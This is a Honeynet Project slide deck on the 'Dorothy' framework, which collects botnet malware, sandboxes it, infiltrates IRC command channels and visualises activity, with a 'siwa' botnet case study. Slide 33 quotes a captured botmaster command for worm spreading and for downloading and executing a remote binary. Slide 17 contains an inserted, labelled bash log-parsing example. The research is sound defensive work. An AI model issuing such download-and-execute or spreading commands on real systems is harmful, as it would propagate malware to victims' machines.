An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization - PowerPoint PPT Presentation



SLIDE 1

An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization

Marco Riccardi – Italian Chapter, The Honeynet Project
Marco Cremonini – Dept. of Information Technology, Università di Milano

SLIDE 2

• Defining the problem: IRC botnets
• Defining the goal to achieve
• The proposed solution: the Dorothy Framework
• The realized proof of concept: honey-dorothy
• Results
• Case study: siwa botnet
• Workplan
• Conclusions

SLIDE 3

• Botnets are considered one of the most dangerous threats
  • Hard to keep pace with their evolution
  • Hard to protect against their attacks
  • Hard to mitigate
• The time between Command and Control (C&C) identification and botnet mitigation is typically too long
  • Technical issues
  • Legal issues

SLIDE 4

• A mitigation plan should be as quick as possible
• Automation is required
• ...otherwise, human interaction is needed
  • Considering the social context (legal, cultural, etc.)
  • All the countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) are to be clearly justified before their execution

SLIDE 5

• A mitigation plan should be as quick as possible
• Automation is required
• ...otherwise, human interaction is needed
  • Considering the social context (legal, economic, operational, etc.)
  • All countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) must be clearly justified before their implementation

Goal: developing a framework that automatically provides all the information needed by an ISP/LEO to activate a mitigation strategy.

SLIDE 6

• Automated framework for IRC botnet analysis
  • Automatic malware acquisition & analysis
  • Automatic C&C IRC channel infiltration
  • Automatic reporting of activity status
• Interactive graphic front-end
• Real-time information about monitored C&Cs
  • Defenders can use this information to develop timely countermeasures to mitigate the risks
• Customizable
  • Defenders could be alerted when botnet activity is detected in their network

SLIDE 7

• Malware Collection Module
• Virtual Honeypot Injection Module
• Network Analysis Module
• Data Extraction Module

SLIDE 8

• Infiltration Module
• Geolocation Module
• Live Data Extraction Module
• Data Visualization Module
• Web Graphical User Interface

SLIDE 9

• Proposed proof of concept
• Developed using the bash scripting language
  • Fully compatible with POSIX systems
  • Fully automated
• Developed to be modular
  • Easy integration with other tools
  • Customizable
• 90% of its components are open source
• The Virtualization Module has been developed on VMware
• A migration to VirtualBox is ongoing

SLIDE 10

• Low interaction honeypots (nepenthes)
• All honeypots upload their malware to a central malware repository
• Support for the Mwcollect Alliance repository has recently been added
• Integration of a malware analysis module (static/dynamic) is ongoing

SLIDE 11

• The virtualization environment has been developed on VMware
• vmtools support the scripting implementation
• The malware is executed on a virtual machine (Win XP SP2)
• After three minutes the VM is reverted to its original snapshot

SLIDE 12

• Inspect the zombie's network behavior during the three minutes of infected VM execution
• The network traffic is sniffed by the tcpdump tool
• The output is stored into a dump file and sent to the next module

SLIDE 13

• The goal of this module is to extract all relevant information about C&Cs
• The extracted information is used for botnet classification
  • C&C IP addresses
  • C&C satellites
  • Associated hostnames
  • Hostnames resolved by DNS servers

SLIDE 14

• Infiltrate, Observe, Report
• IRC-drone
  • Fully written in bash
  • Multichannel support
  • Auto-responds to PING requests
  • The drone injects all the IRC commands extracted from the traffic generated by VM zombies as is
• Compatible with non IRC-compliant C&Cs
• The connection toward the C&C is anonymized through the TOR network

SLIDE 15

• All the data received from and sent to C&Cs are logged into txt files
• Instant notification by email when:
  • The topic changes
  • A new command is issued by the bot master
  • A MODE option is modified
• A full module re-engineering is ongoing
  • Multiplatform
  • Support for more onion networks

SLIDE 16

• Geolocation information gives an approximate geographical location of C&Cs
  • Can be useful to consider the social context
• Useful for understanding which law enforcement officer to notify
• Provided by GeoCityLite
• Free, good approximation

SLIDE 17

• All log files generated by the IRC-drone are parsed
  • Topic extraction
  • Botmaster nickname/user host extraction
  • Time delay calculation
    • Between each topic modification
    • Between each PING request (i.e. heartbeat)
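A parser for drone logs of this kind, as an added example (not the Dorothy Project's own code): it assumes a constructed log format of one raw IRC line per entry prefixed with a Unix timestamp, extracts topics, takes whoever sets the topic as the botmaster (an assumption), computes the average delay between TOPIC changes and between PINGs (the heartbeat), and lists the events a notification module would alert on.

```shell
#!/bin/bash
# Constructed sample drone log; assumed format: "<epoch> <raw IRC line>"
LOG=$(mktemp); trap 'rm -f "$LOG"' EXIT
cat >"$LOG" <<'EOF'
1234567890 :irc.example.test 001 drone :Welcome to the network
1234567900 PING :irc.example.test
1234567960 PING :irc.example.test
1234567990 :Master!~op@192.0.2.10 TOPIC #siwa :.scan on
1234568020 PING :irc.example.test
1234568100 :Master!~op@192.0.2.10 MODE #siwa +m
1234568290 :Master!~op@192.0.2.10 TOPIC #siwa :.update now
1234568300 :Master!~op@192.0.2.10 PRIVMSG #siwa :.scan off
1234568310 :Zombie1!~abc@198.51.100.7 PRIVMSG #siwa :scan thread stopped
EOF

# Topic changes as "<epoch> <channel> <topic text>"
extract_topics() {
  sed -n 's/^\([0-9]*\) :[^ ]* TOPIC \([^ ]*\) :\(.*\)$/\1 \2 \3/p' "$1"
}

# Botmaster heuristic (assumption): whoever sets the topic, as nick!user@host
botmasters() {
  awk '$3 == "TOPIC" { sub(/^:/, "", $2); print $2 }' "$1" | sort -u
}

# Average seconds between consecutive occurrences of an IRC command
# (TOPIC = topic activity, PING = C&C heartbeat); 0 if seen fewer than twice
avg_delay() {
  awk -v cmd="$2" '
    $2 == cmd || $3 == cmd {
      if (seen) { sum += $1 - prev; n++ }
      prev = $1; seen = 1
    }
    END { printf "%d\n", (n ? sum / n : 0) }' "$1"
}

# Lines that would trigger a notification: TOPIC/MODE changes, botmaster commands
alert_events() {
  masters=" $(botmasters "$1" | tr '\n' ' ')"
  awk -v masters="$masters" '
    $3 == "TOPIC" || $3 == "MODE" { print $1, $3; next }
    $3 == "PRIVMSG" { src = $2; sub(/^:/, "", src)
                      if (index(masters, " " src " ")) print $1, "COMMAND" }' "$1"
}

echo "botmaster(s): $(botmasters "$LOG")"
echo "heartbeat avg: $(avg_delay "$LOG" PING)s, topic avg: $(avg_delay "$LOG" TOPIC)s"
alert_events "$LOG"
```

The zombie's PRIVMSG is deliberately not reported as a command, since only hosts that set the topic count as botmasters here.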

SLIDE 18

Parameters: IPs, Hosts, Ports, Zombies, Malwares, Chans, Satellites, ALL-Hosts, Mail Addr

SLIDE 19

Legend (shape and color per node type):
  • Circle: Targets
  • Circle: C&C
  • Circle: Satellites
  • Circle: Spreading
  • Circle: Spam
  • Square: Services
  • Triangle: Source


SLIDE 22

"Overview first, zoom and filter, then details on-demand"
  • B. Shneiderman. The eyes have it: A task by data type taxonomy for information visualizations.

SLIDE 23

• Tested for a period of 27 days between January and March 2009
• Two public IPs used for malware acquisition
• 3900 malware samples downloaded
  • 304 unique
  • 562,657 Mb downloaded
• 16 unique C&Cs classified
  • 50 IRC channels monitored
• 8992 unique public IPs identified as zombies

SLIDE 24

• Formed by 5 C&C servers
  • 2 located in China
  • 2 located in Canada
  • 1 located in Holland
• 7 different channel names used
  • #siwa was the most used
• 37 different C&C satellites providing botnet updating service through HTTP
• 42 host names related to siwa IP addresses
• 4346 unique IP addresses identified as zombies

SLIDE 25

SLIDE 26

• Redesign of the information flow management
  • Information repository stored into a relational database
• Evaluate developing the core engine in other programming languages
• Integration of a malware analysis module
  • Dynamic & static analysis
• Virtual Honeypot: migration to VirtualBox

SLIDE 27

• New module design and realization
  • A module for analyzing P2P botnets
  • A spam-trap implementation is ongoing
• Development of a new IRC Drone
  • Multiplatform, distributed

SLIDE 28

• Data visualization tuning
  • Investigating new ways of representing botnet data
• Developing a new web interface
  • More dynamic
  • Multi-user / user customizable
• Improve the notification process
  • Mailing list
  • Web 2.0 communication channels (twitter, feeds, blogs, ...)

SLIDE 29

• The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
• Today, there are different contributors supporting the project:
  • Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tools (H.I.V.E) with honey-dorothy
  • Three students from the University of Milan are developing new malware analysis modules
  • The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework

SLIDE 30

• The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
• Today, there are different contributors supporting the project:
  • Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tools (H.I.V.E) with honey-dorothy
  • Three students from the University of Milan are developing new malware analysis modules
  • The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework
  ...we hope to receive your support too!

SLIDE 31

SLIDE 32

The Italian Honeynet Chapter – www.honeynet.it
Marco Riccardi – marco.riccardi [at] honeynet [dot] it
Marco Cremonini – marco.cremonini [at] unimi [dot] it

SLIDE 33

• Botmaster execution request

##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e -s 72.xxx.xxx.xxx:2293

• Zombies response

--> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread 72.xxx.xxx.xxx:2293
--> :Tdkzdtwh!~bxoluj@mna75-4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :-04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

SLIDE 34

  • Pie charts: number of DNS queries
  • Bar charts: number of DNS queries executed by analyzed malware, grouped by C&C

SLIDE 35

  • C&C heart-beat: average time between two PING requests
  • Topic activity: average time between TOPIC changes

SLIDE 36

• A full module re-engineering is ongoing
• The new drone will be multiplatform
• Anyone can support the infiltration process
• It will support more than one onion network
• It will send its log to a central log concentrator
• Integrity and confidentiality have to be managed accurately